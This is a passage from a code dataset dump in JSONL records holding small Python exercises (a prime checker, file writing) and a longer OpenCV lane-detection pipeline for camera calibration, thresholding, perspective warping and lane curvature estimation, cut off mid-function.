sign\r\nprint(get_course(\"gangqin\"))\r\n","sub_path":"168206221/狄克斯特拉算法.py","file_name":"狄克斯特拉算法.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415094340","text":"cont = int(input())\n\nwhile cont != 0:\n\n num = int(input())\n div = 2\n primo = True\n\n while primo and div <= num ** 0.5:\n if num % div == 0:\n primo = False\n div += 1\n if primo:\n print(\"%i eh primo\" % num)\n else:\n print(\"%i nao eh primo\" % num)\n\n cont -= 1\n","sub_path":"iniciante/1165 - Número Primo.py","file_name":"1165 - Número Primo.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"544911465","text":"# Filename: Program10-01.py\r\n# Author: N. Anim\r\n# Date: Apr. 25, 2016\r\n# Purpose: To demonstrate how to create a file object,\r\n# open a file, write to a file, and close a file.\r\n# This script is based on the algorithm in Figure 10-4.\r\n\r\n# Create a file object and open a file named \"philosophers.txt\"\r\noutfile = open(\"philosophers.txt\", 'w')\r\n\r\n# Write the names of some philosophers to the file\r\noutfile.write('Aristotle\\n')\r\noutfile.write('Plato\\n')\r\noutfile.write('Locke\\n')\r\noutfile.write('Hume\\n')\r\noutfile.write('Kirkgaard\\n')\r\n\r\n# Close the file\r\noutfile.close()\r\n","sub_path":"Programs/Program10-01.py","file_name":"Program10-01.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"611773275","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\nimport os\nimport pickle\nfrom moviepy.editor import VideoFileClip\nfrom tqdm import tqdm\n\n#-----------------------------------------------------------------------#\n# Define a class to receive the characteristics of each line detection\n#-----------------------------------------------------------------------#\nclass Line():\n def __init__(self):\n self.detected = False # was the line detected in the last iteration?\n self.recent_xfitted = [] # x values of the last n fits of the line\n self.bestx = None #average x values of the fitted line over the last n iterations\n self.best_fit = None #polynomial coefficients averaged over the last n iterations\n self.current_fit = [np.array([False])] #polynomial coefficients for the most recent fit\n self.radius_of_curvature = None #radius of curvature of the line in some units\n self.line_base_pos = None #distance in meters of vehicle center from the line\n self.diffs = np.array([0,0,0], dtype='float') #difference in fit coefficients between last and new fits\n self.allx = None #x values for detected line pixels\n self.ally = None #y values for detected line pixels\n\n#-----------------------------------------------------------------------#\n# Calibrate Camera using Sample Images provided and store it in a Pickle\n# file. If there is a pickle file exists already, then read that file\n# and return the Camera Matrix (mtx) and Distortion Coefficients (dist)\n#-----------------------------------------------------------------------#\ndef calibrateCameraBySamples(samples_folder, file_name_pattern, nx, ny, pickle_file_name='cam_calib_mtx_dist.p', save_calibration=True):\n mtx, dist = None, None\n pickle_file_path_name = None\n if (pickle_file_name is not None):\n pickle_file_path_name = os.path.join(samples_folder, pickle_file_name)\n \n if os.path.isfile(pickle_file_path_name):\n # Read in the saved camera matrix and distortion coefficients\n print('Reading calibration from pickle file', pickle_file_path_name)\n dist_pickle = pickle.load( open( pickle_file_path_name, \"rb\" ) )\n mtx = dist_pickle[\"mtx\"]\n dist = dist_pickle[\"dist\"]\n else:\n print('Generating calibration from sample images in ', samples_folder)\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2)\n \n objpoints = []\n imgpoints = []\n img_size = None\n \n fnames = os.path.join(samples_folder, file_name_pattern)\n print(fnames)\n images = glob.glob(fnames)\n for idx, fname in tqdm(enumerate(images)):\n img = mpimg.imread(fname)\n if img_size == None:\n img_size = img.shape[0:2]\n print('img_size = ', img_size)\n ret, corners = cv2.findChessboardCorners(img, (nx,ny))\n #print(idx, fname, ret)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n \n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n if save_calibration == True:\n dist_pickle = {}\n dist_pickle['mtx'] = mtx\n dist_pickle['dist'] = dist\n print('Storing mtx and dist values in', pickle_file_path_name)\n pickle.dump( dist_pickle, open( pickle_file_path_name, \"wb\" ) )\n \n return mtx, dist\n\n#-----------------------------------------------------------------------#\n# Verify the Camera Matrix (mtx) and Distortion Coefficients (dist) by\n# Undistorting a sample image. Compare the original and undistorted\n# images by plotting them side by side\n#-----------------------------------------------------------------------#\ndef testUndistor(img_file_name, mtx, dist):\n img = mpimg.imread(img_file_name)\n dst = cv2.undistort(img, mtx, dist, None, mtx)\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img)\n ax1.set_title('Original Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(dst)\n ax2.set_title('UnDistorted Image', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() \n\n#-----------------------------------------------------------------------#\n# Function that gives out the src and dst coordinates array to use for \n# warp transformations.\n#-----------------------------------------------------------------------#\ndef getTransformationPoints(img):\n s_tl, d_tl = [500, 510], [227, 333] #top left\n s_tr, d_tr = [790, 510], [1067, 333] #top right\n s_br, d_br = [1012, 647], [1067, 646] #bottom left\n s_bl, d_bl = [306, 647], [227, 646] #bottom right\n\n src = np.float32([ s_tl, s_tr, s_br, s_bl ])\n dst = np.float32([ d_tl, d_tr, d_br, d_bl ])\n# print('src', src)\n# print('dst', dst)\n return src, dst\n\n#-----------------------------------------------------------------------#\n# A function that provides the Transformation matrix & Inverse \n# Transformation for the given src & dst coordinates\n#-----------------------------------------------------------------------#\ndef getTransformationMatrices(src, dst):\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n return M, Minv\n\n#-----------------------------------------------------------------------#\n# A convenience function to view 3 images in a row\n#-----------------------------------------------------------------------#\ndef visualize3Images(img1, img2, img3):\n f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1)\n ax1.set_title('Original Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(img2)\n ax2.set_title('Warped Image', fontsize=20)\n ax3.grid(True)\n ax3.imshow(img3, cmap='gray')\n ax3.set_title('Thresholded Binary Image', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() \n\n#-----------------------------------------------------------------------#\n# A convenience function to view 2 images in a row\n#-----------------------------------------------------------------------#\ndef visualize2Images(img1, img2):\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1)\n ax1.set_title('Oringal Image', fontsize=20)\n ax2.grid(True)\n ax2.imshow(img2, cmap='gray')\n ax2.set_title('Thresholded Color Binary', fontsize=20)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show()\n\n#-----------------------------------------------------------------------#\n# A convenience function to view one images & a graph plot in a row\n#-----------------------------------------------------------------------#\ndef visualizeImageGraph(img1, grph):\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))\n f.tight_layout()\n ax1.grid(True)\n ax1.imshow(img1, cmap='gray')\n ax1.set_title('Warped Threshold Binary', fontsize=20)\n ax2.grid(True)\n ax2.plot(grph)\n ax2.set_title('Histogram', fontsize=20)\n plt.xlim(0, 1280)\n plt.ylim(0, 250)\n plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n plt.show() \n\n#-----------------------------------------------------------------------#\n# Function to apply Sobel operator for the given orientation & kernal\n# and to threshold Sobel derivatives for the given range\n#-----------------------------------------------------------------------#\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('abs_sobel_thresh - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, (1 if orient == 'x' else 0), (1 if orient == 'y' else 0))\n abs_sobelx = np.absolute(sobelx)\n scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n binary_output = np.zeros_like(scaled_sobel)\n binary_output[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n return binary_output\n\n#-----------------------------------------------------------------------#\n# Function to arrive at the Magniture threshold for the given image & \n# threshold range\n#-----------------------------------------------------------------------#\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('mag_thresh - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1,0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0,1, ksize=sobel_kernel)\n abs_sobelxy = np.sqrt(np.square(sobelx) + np.square(sobely))\n scaled_sobelxy = np.uint8( 255*abs_sobelxy/np.max(abs_sobelxy) )\n binary_output = np.zeros_like(scaled_sobelxy)\n binary_output[(scaled_sobelxy >= mag_thresh[0]) & (scaled_sobelxy<= mag_thresh[1])] = 1\n return binary_output\n \n#-----------------------------------------------------------------------#\n# Function to arrive at the Directional threshold for the given image & \n# threshold range\n#-----------------------------------------------------------------------#\ndef dir_threshold(img, sobel_kernel=3, dir_thresh=(0, np.pi/2)):\n gray = img\n if (len(img.shape) == 3 and img.shape[2] > 2):\n print('dir_threshold - converting to gray')\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1,0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0,1, ksize=sobel_kernel)\n abs_sobelx = np.absolute(sobelx)\n abs_sobely = np.absolute(sobely)\n #abs_sobelxy = np.sqrt(sobelx**2 + sobely**2)\n arc_sobel = np.arctan2(abs_sobely, abs_sobelx)\n binary_output = np.zeros_like(arc_sobel)\n binary_output[(arc_sobel>=dir_thresh[0]) & (arc_sobel<=dir_thresh[1])] = 1\n #print(arc_sobel[200:420, 0:200])\n return binary_output\n\n#-----------------------------------------------------------------------#\n# Function to verify the current radius of curvature with the previous \n# frame's Radius of curvature and return the suitable polyfit values\n#-----------------------------------------------------------------------#\ndef lineCheck(line, curverad, fitx, fit):\n # line check for the lane\n if line.detected: # If lane is detected\n # If sanity check passes\n if abs(curverad / line.radius_of_curvature - 1) < .6: \n print('line.detected is true and roc ratio is < 0.6') \n line.detected = True\n line.current_fit = fit\n line.allx = fitx\n line.bestx = np.mean(fitx) \n line.radius_of_curvature = curverad\n # If sanity check fails use the previous values\n else:\n print('line.detected is true and roc ratio is > 0.6') \n line.detected = False\n fitx = line.allx\n else:\n # If lane was not detected and no curvature is defined\n if line.radius_of_curvature: \n if abs(curverad / line.radius_of_curvature - 1) < 1: \n print('line.detected is false and roc ration is < 1')\n line.detected = True\n line.current_fit = fit\n line.allx = fitx\n line.bestx = np.mean(fitx) \n line.radius_of_curvature = curverad\n else:\n print('line.detected is false and roc ration is > 1')\n line.detected = False\n fitx = line.allx \n # If curvature was defined\n else:\n print('first time data getting set in Line object')\n line.detected = True\n line.current_fit = fit\n line.allx = fitx\n line.bestx = np.mean(fitx)\n line.radius_of_curvature = curverad\n return fitx\n\n\n#-----------------------------------------------------------------------#\n# Function to find the lane line pixels for the given binary warped \n# image and using the line positions of previous frame\n#-----------------------------------------------------------------------#\ndef findXY_NonHistogram(binary_warped, left_fit, right_fit):\n print('Finding fit by non-histogram function')\n # Assume you now have a new warped binary image \n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 100\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin))) \n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin))) \n \n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n \n return leftx, lefty, rightx, righty\n\n\n#-----------------------------------------------------------------------#\n# Function to apply polyfit on the x,y positions and to arrive at the \n# second degree polynomial\n#-----------------------------------------------------------------------#\ndef pixelPositionToXYValues(leftx, lefty, rightx, righty, yvalue):\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n \n # Generate x and y values for plotting\n ploty = np.linspace(0, yvalue-1, yvalue)\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2] \n \n return left_fit, right_fit, left_fitx, right_fitx, ploty\n \n\n#-----------------------------------------------------------------------#\n# Function to find the lane line pixels for the given binary warped \n# using the Histogram and Sliding window method\n#-----------------------------------------------------------------------#\ndef findXY_Histogram(binary_warped):\n #1\n histogram = np.sum(binary_warped[binary_warped.shape[0]/2:,:], axis=0)\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n #visualizeImageGraph(out_img, histogram)\n\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0]/2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n \n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0]/nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n \n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 100\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n \n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window+1)*window_height\n win_y_high = binary_warped.shape[0] - window*window_height\n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n \n # Draw the windows on the visualization image\n cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0), 2) \n cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0), 2)\n \n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0] \n #print('good_left_inds', good_left_inds)\n #print('good_right_inds', good_right_inds)\n \n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n \n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds] \n \n #For Display \n# left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, out_img.shape[0])\n# out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n# out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n# plt.imshow(binary_warped, cmap='gray')\n# plt.plot(left_fitx, ploty, color='red', linewidth=3.0)\n# plt.plot(right_fitx, ploty, color='red', linewidth=3.0)\n# plt.xlim(0, 1280)\n# plt.ylim(720, 0)\n# plt.show()\n \n return leftx, lefty, rightx, righty #, out_img\n\n#-----------------------------------------------------------------------#\n# Function to calculate the radius of the curvature for the given x, y\n# values and convert them from pixel to real world metres perspective\n#-----------------------------------------------------------------------#\ndef calculateRadiusOfCurvature(x, y):\n # Define conversions in x and y from pixels space to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n y_eval = np.max(y)\n \n # Fit new polynomials to x,y in world space\n fit_cr = np.polyfit(y*ym_per_pix, x*xm_per_pix, 2)\n # Calculate the new radii of curvature\n curve_rad = ((1 + (2*fit_cr[0]*y_eval*ym_per_pix + fit_cr[1])**2)**1.5) / np.absolute(2*fit_cr[0])\n # Now our radius of curvature is in meters\n #print(left_curverad, 'm', right_curverad, 'm')\n # Example values: 632.1 m 626.2 m\n return curve_rad\n\n#-----------------------------------------------------------------------#\n# Function to calculate the vehicle position with respect to lane lines\n# It is calculated based on the image width and lane line coordinates\n#-----------------------------------------------------------------------#\ndef calculateVehiclePosition(image_width, pts):\n # Find the position of the car from the center\n # It will show if the car is 'x' meters from the left or right\n position = image_width/2\n left = np.min(pts[(pts[:,1] < position) & (pts[:,0] > 700)][:,1])\n right = np.max(pts[(pts[:,1] > position) & (pts[:,0] > 700)][:,1])\n center = (left + right)/2\n # Define conversions in x and y from pixels space to meters\n xm_per_pix = 3.7/700 # meteres per pixel in x dimension \n #print(position, center, 'in pixels', (position - center))\n return (position - center)*xm_per_pix\n\n#-----------------------------------------------------------------------#\n# A convenience Function that draws polygon on the given image, reverts \n# the perspective transformation using Minv and writes the texts.\n#-----------------------------------------------------------------------#\ndef drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, text1, text2=None):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(binary_warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, img_size) \n # Combine the result with the original image\n result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n\n # Find the position of the car\n pts = np.argwhere(newwarp[:,:,1])\n position = calculateVehiclePosition(undist.shape[1], pts)\n text11 = ''\n if position < 0:\n text11 = \"Vehicle is {:.3f} Metre left of center\".format(-position)\n else:\n text11 = \"Vehicle is {:.3f} Metre right of center\".format(position)\n \n # Put text on an image\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(result, text1, (10,30), font, 1, (255,255,255), 2)\n cv2.putText(result, text11, (10,60), font, 1, (255,255,255), 2)\n cv2.putText(result, text2, (10,100), font, 1, (255,255,255), 2)\n \n return result\n\n\n#-----------------------------------------------------------------------#\n# Function to generate a warped thresholded color binary image from the given\n# color image and other threshold parameters\n#-----------------------------------------------------------------------#\n# UNUSED FUNCTION\ndef getBinaryImage1(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img1 = np.copy(img)\n# img = np.copy(img)\n \n img = cv2.undistort(img, mtx, dist, None, mtx)\n# plt.title('Inprogress image in the pipeline - Undistorted Image')\n# plt.imshow(img)\n# plt.show()\n undist = np.copy(img)\n \n\n img_size = (img.shape[1], img.shape[0])\n src, dst = getTransformationPoints(img)\n #pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)\n# src = src.reshape((-1,1,2))\n# src1 = src.astype(np.int32)\n# cv2.polylines(img,[src1],True,(255,0,0), 2)\n \n M, Minv = getTransformationMatrices(src, dst)\n warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n# visualize2Images(img, warped)\n img = warped\n #gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # Convert to HLS color space and separate the V channel\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)\n h_channel = hls[:,:,0]\n l_channel = hls[:,:,1]\n s_channel = hls[:,:,2]\n #s_channel = gray\n \n # Sobel x\n gradx = abs_sobel_thresh(s_channel, orient='x', sobel_kernel=sobel_kernel, thresh=(20, 100))\n grady = abs_sobel_thresh(s_channel, orient='y', sobel_kernel=sobel_kernel, thresh=(20, 100))\n mag_binary = mag_thresh(s_channel, sobel_kernel=sobel_kernel, mag_thresh=(20, 100))\n dir_binary = dir_threshold(s_channel, sobel_kernel=sobel_kernel, dir_thresh=(0.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined [((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n \n # Threshold color channel\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n # Stack each channel\n # Note color_binary[:, :, 0] is all 0s, effectively an all black image. It might\n # be beneficial to replace this channel with something else.\n #color_binary = np.dstack(( img[:,:,1], combined, s_binary))\n #color_binary = np.dstack(( np.zeros_like(combined), combined, s_binary))\n color_binary = np.zeros_like(combined)\n color_binary[(s_binary > 0) | (combined > 0)] = 1\n #visualize3Images(img1, warped, color_binary)\n return M, Minv, undist, color_binary\n\n#-----------------------------------------------------------------------#\n# Function to generate a warped thresholded color binary image from the given\n# color image and other threshold parameters\n#-----------------------------------------------------------------------#\ndef getBinaryImage(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img1 = np.copy(img)\n \n img = cv2.undistort(img, mtx, dist, None, mtx)\n undist = np.copy(img)\n \n img_size = (img.shape[1], img.shape[0])\n src, dst = getTransformationPoints(img)\n\n HSV = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n \n # For yellow\n yellow = cv2.inRange(HSV, (20, 100, 100), (50, 255, 255))\n \n # For white\n sensitivity_1 = 68\n white = cv2.inRange(HSV, (0,0,255-sensitivity_1), (255,20,255))\n \n sensitivity_2 = 60\n HSL = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n white_2 = cv2.inRange(HSL, (0,255-sensitivity_2,0), (255,255,sensitivity_2))\n white_3 = cv2.inRange(img, (200,200,200), (255,255,255))\n \n bit_layer = np.zeros_like(yellow)\n bit_layer[(yellow > 0) | (white > 0) | (white_2 > 0) | (white_2 > 0) | (white_3 > 0)] = 1\n \n M, Minv = getTransformationMatrices(src, dst)\n warped = cv2.warpPerspective(bit_layer, M, img_size, flags=cv2.INTER_LINEAR)\n #visualize2Images(img, warped)\n return M, Minv, undist, warped\n\n#-----------------------------------------------------------------------#\n# Define a class to store & send initial settings\n#-----------------------------------------------------------------------#\nclass Parameters():\n def __init__(self):\n self.sobel_kernel=7 # Kernal Size to use in Sobel Processing\n self.x_thresh = (20, 100) # Threshold for Sobel X-Orientation processing\n self.y_thresh = (20, 100) # Threshold for Sobel Y-Orientation processing\n self.mag_thresh = (20, 100) # Threshold for Sobel Magnitude processing\n self.dir_thresh = (0.7, 1.3) # Threshold for Sobel Directional processing\n self.s_thresh=(170, 255) # Threshold for Sobel Combined X Processed image\n self.sx_thresh=(20, 100) # Threshold for Color Binary Processing\n self.M = None # Perspective Transformation Matrix\n self.Minv = None # Perspective Transformation Inverse Matrix\n\n def printValues(self):\n print('sobel_kernel=', self.sobel_kernel )\n print('x_thresh=', self.x_thresh)\n print('y_thresh=', self.y_thresh)\n print('mag_thresh=', self.mag_thresh)\n print('dir_thresh=', self.dir_thresh)\n print('s_thresh=', self.s_thresh)\n print('sx_thresh=', self.sx_thresh)\n print('M=', self.M)\n print('Minv=', self.Minv)\n \n#-----------------------------------------------------------------------#\n# Define a class to store Camera Calibration settings\n#-----------------------------------------------------------------------#\nclass CameraCalibration():\n def __init__(self):\n self.pickle_file_name = 'cam_calib_mtx_dist.p' # Camera Calibration Details Pickel file name\n self.nx = 9 # Number of inside corners in x axis\n self.ny = 6 # Number of inside corners in y axis\n self.mtx = None # Camera Calibration Matrix\n self.dist = None # Camera Distortion Matrix\n\n#-----------------------------------------------------------------------#\n# The image/frame processing pipeline function. It intakes a color \n# image as an input and returns a color image containing a filled polygon\n# for the lanes identifed.\n#-----------------------------------------------------------------------#\ndef pipeline(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n img_size = (img.shape[1], img.shape[0])\n global cnt_h\n global cnt_nh\n\n M, Minv, undist, binary_warped = getBinaryImage(img, mtx, dist, sobel_kernel, s_thresh=s_thresh, sx_thresh=sx_thresh)\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n leftx, lefty, rightx, righty = None, None, None, None\n\n if (left_line.detected == False) or (right_line.detected == False):\n #find by histogram method\n print('to detect lane through histogram')\n leftx, lefty, rightx, righty = findXY_Histogram(binary_warped)\n cnt_h += 1\n else:\n #find by non-histogram method\n print('to detect lane through non-histogram')\n leftx, lefty, rightx, righty = findXY_NonHistogram(binary_warped, left_line.current_fit, right_line.current_fit)\n cnt_nh += 1\n\n print('Lane finding by Histogram =', cnt_h, ', by Non-Histogram = ', cnt_nh)\n left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, binary_warped.shape[0])\n #Find Radius of Curvature\n left_curve_rad = calculateRadiusOfCurvature(leftx, lefty)\n right_curve_rad = calculateRadiusOfCurvature(rightx, righty)\n average_curve_rad = (left_curve_rad + right_curve_rad) / 2\n #print('Left', left_curve_rad, 'metres, Right', right_curve_rad, 'metres', 'Average-smoothed', average_curve_rad)\n \n print('left_fitx & right_fitx Before lineCheck', left_fitx[0], right_fitx[0])\n left_fit_x = lineCheck(left_line, left_curve_rad, left_fitx, left_fit)\n right_fit_x = lineCheck(right_line, right_curve_rad, right_fitx, right_fit)\n print('left_fitx & right_fitx After lineCheck', left_fitx[0], right_fitx[0])\n \n out_img[lefty, leftx] = [255, 0, 0]\n out_img[righty, rightx] = [0, 0, 255]\n #visualize2Images(binary_warped, out_img)\n \n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n roc_text = \"Radius of Curvature: {0:.3f} Metres (Left={1:.3f}, Right={2:.3f})\".format(average_curve_rad, left_curve_rad, right_curve_rad)\n cnt_text = ''#\"By Histogram:{}, Non-Histogram:{}\".format(cnt_h, cnt_nh)\n result = drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, roc_text, cnt_text)\n return result\n\n\n# Pipeline to be used for Image processing\n#def pipeline(img, mtx, dist, sobel_kernel=3, s_thresh=(170, 255), sx_thresh=(20, 100)):\n# \n# img_size = (img.shape[1], img.shape[0])\n# M, Minv, undist, binary_warped = getBinaryImage(img, mtx, dist, sobel_kernel, s_thresh=s_thresh, sx_thresh=sx_thresh)\n# out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n# leftx, lefty, rightx, righty, out_img = findXY_Histogram(binary_warped)\n# left_fit, right_fit, left_fitx, right_fitx, ploty = pixelPositionToXYValues(leftx, lefty, rightx, righty, binary_warped.shape[0]) \n# #Find Radius of Curvature\n# left_curve_rad = calculateRadiusOfCurvature(leftx, lefty)\n# right_curve_rad = calculateRadiusOfCurvature(rightx, righty)\n# average_curve_rad = (left_curve_rad + right_curve_rad) / 2\n# print('Left', left_curve_rad, 'metres, Right', right_curve_rad, 'metres', 'Average-smoothed', average_curve_rad)\n# \n# # Find camera position\n# left_mean = np.mean(leftx)\n# right_mean = np.mean(rightx)\n# camera_pos = (img_size[0]/2)-np.mean([left_mean, right_mean])\n# print('camera_pos', camera_pos )\n# xm_per_pix = 3.7/500\n# print('actual camera_pos', str(camera_pos*xm_per_pix)[:6], str(camera_pos*xm_per_pix))\n# \n# out_img[lefty, leftx] = [255, 0, 0]\n# out_img[righty, rightx] = [0, 0, 255]\n# \n# # Recast the x and y points into usable format for cv2.fillPoly()\n# pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n# pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n# pts = np.hstack((pts_left, pts_right))\n# roc_text = \"Radius of Curvature: {0:.3f} Metres (Left={1:.3f}, Right={2:.3f})\".format(average_curve_rad, left_curve_rad, right_curve_rad)\n# result = drawPolygonAndUnwrap(binary_warped, undist, pts, Minv, img_size, roc_text, None)\n# \n# return result\n \n#-----------------------------------------------------------------------#\n# A convenience method to process test images\n#-----------------------------------------------------------------------#\ndef processImages():\n nx = 9 #Number of inside corners in x axis\n ny = 6 #Number of inside corners in y axis\n mtx, dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', nx, ny, 'cam_calib_mtx_dist.p', True)\n #testUndistor('camera_cal/calibration5.jpg', mtx, dist)\n #testUndistor('test_images/test3.jpg', mtx, dist)\n ksize = 7 # Choose a Sobel Kernel size, larger odd number to smooth gradient measurements\n\n # Main Function\n print('\\n***** Starting Main Function *****')\n cam_calib = CameraCalibration()\n cam_calib.mtx, 